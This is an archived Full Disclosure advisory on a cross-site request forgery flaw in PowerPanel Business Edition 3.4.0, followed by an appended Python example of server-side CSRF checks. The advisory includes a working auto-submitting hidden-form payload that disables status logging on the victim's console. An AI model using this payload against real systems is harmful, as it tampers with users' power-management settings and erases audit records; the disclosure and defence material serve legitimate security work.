Full Disclosure mailing list archives
PowerPanel Business Edition 3.4.0 - Cross Site Request Forgery
From: Joey Lane via Fulldisclosure <fulldisclosure () seclists org>
Date: Tue, 9 Jul 2019 17:19:27 -0500
# Exploit Title: PowerPanel Business Edition 3.4.0 - Cross Site Request Forgery
# Date: 7/9/2019
# Exploit Author: Joey Lane
# Vendor Homepage: https://www.cyberpowersystems.com
# Version: 3.4.0
# Tested on: Ubuntu 16.04
# CVE : CVE-2019-13071
# Reported to vendor on 5/25/2019, no acknowledgement.

The Agent/Center component of PowerPanel Business Edition is vulnerable to cross-site request forgery. This can be exploited by tricking an authenticated user into visiting a web page controlled by a malicious person. The following example uses CSRF to disable Status Recording under the Logs / Settings page.

Create a file named 'csrf.html' on a local workstation with the following contents:

    <iframe style="display:none" name="csrf-frame"></iframe>
    <div style="display: none;">
      <form method='POST' action='http://(A VALID HOST NAME):3052/agent/log_options' target="csrf-frame" id="csrf-form">
        <input type='hidden' name='value(recordingEnable)' value='no'>
        <input type='hidden' name='value(recordingInterval)' value='10'>
        <input type='hidden' name='value(periodToRemoveRecord)' value='2'>
        <input type='hidden' name='value(clearAllStatusLogs)' value='no'>
        <input type='hidden' name='value(type)' value='records'>
        <input type='hidden' name='value(action)' value='Apply'>
        <input type='hidden' name='value(button)' value='Apply'>
        <input type='submit' value='submit'>
      </form>
    </div>
    <script>document.getElementById("csrf-form").submit()</script>

Serve the file using Python or any other web server:

    python -m SimpleHTTPServer 8000

Visit the local page in a browser while logged into PowerPanel Business Edition:

    http://localhost:8000/csrf.html

The hidden form is submitted in the background and will disable Status Recording. This could be adapted to exploit other forms in the web application as well.

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
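Server-side mitigation for the class of issue described above, as an added example that is not part of the advisory or of PowerPanel's own code: a check a state-changing handler such as /agent/log_options could apply before acting on the form. The csrf_token field name, the ups-agent.example host and the request dictionaries are constructed for illustration, not taken from the product.

```python
"""CSRF defence for a state-changing form handler (added example).

Two independent checks: the request's Origin (or Referer) must match the
application's own origin, and the body must carry a per-session anti-CSRF
token the attacker's page cannot read. The hidden-form attack above fails
both: the browser sends Origin: http://localhost:8000 and no token.
"""
import hmac
import secrets
from typing import Dict, Optional, Tuple
from urllib.parse import urlsplit

CSRF_FIELD = "csrf_token"  # hypothetical field name, not from the product


def new_session_token() -> str:
    """Unguessable per-session token to embed in legitimate forms."""
    return secrets.token_urlsafe(32)


def _request_origin(headers: Dict[str, str]) -> Optional[str]:
    """Return scheme://host[:port] from Origin, else from Referer, else None."""
    h = {k.lower(): v for k, v in headers.items()}  # header names are case-insensitive
    if h.get("origin"):
        return h["origin"].rstrip("/")
    if h.get("referer"):
        p = urlsplit(h["referer"])
        return f"{p.scheme}://{p.netloc}"
    return None


def csrf_check(method: str, headers: Dict[str, str], form: Dict[str, str],
               session_token: str, app_origin: str) -> Tuple[bool, str]:
    """Return (allowed, reason). Only safe methods bypass the checks."""
    if method.upper() in ("GET", "HEAD", "OPTIONS"):
        return True, "safe method"
    origin = _request_origin(headers)
    if origin is None:
        return False, "missing Origin and Referer"  # fail closed
    if origin != app_origin:
        return False, f"cross-origin request from {origin}"
    submitted = form.get(CSRF_FIELD, "")
    # constant-time comparison on bytes so non-ASCII input cannot raise
    if not submitted or not hmac.compare_digest(submitted.encode(), session_token.encode()):
        return False, "missing or invalid anti-CSRF token"
    return True, "ok"


# Constructed requests modelled on the advisory's hidden form (placeholder host).
APP_ORIGIN = "http://ups-agent.example:3052"
ATTACK_FORM = {"value(recordingEnable)": "no", "value(type)": "records", "value(action)": "Apply"}
ATTACK_HEADERS = {"Origin": "http://localhost:8000", "Referer": "http://localhost:8000/csrf.html"}
```

A SameSite=Lax or Strict attribute on the session cookie adds a third, browser-enforced layer, but the token and origin checks above do not depend on it.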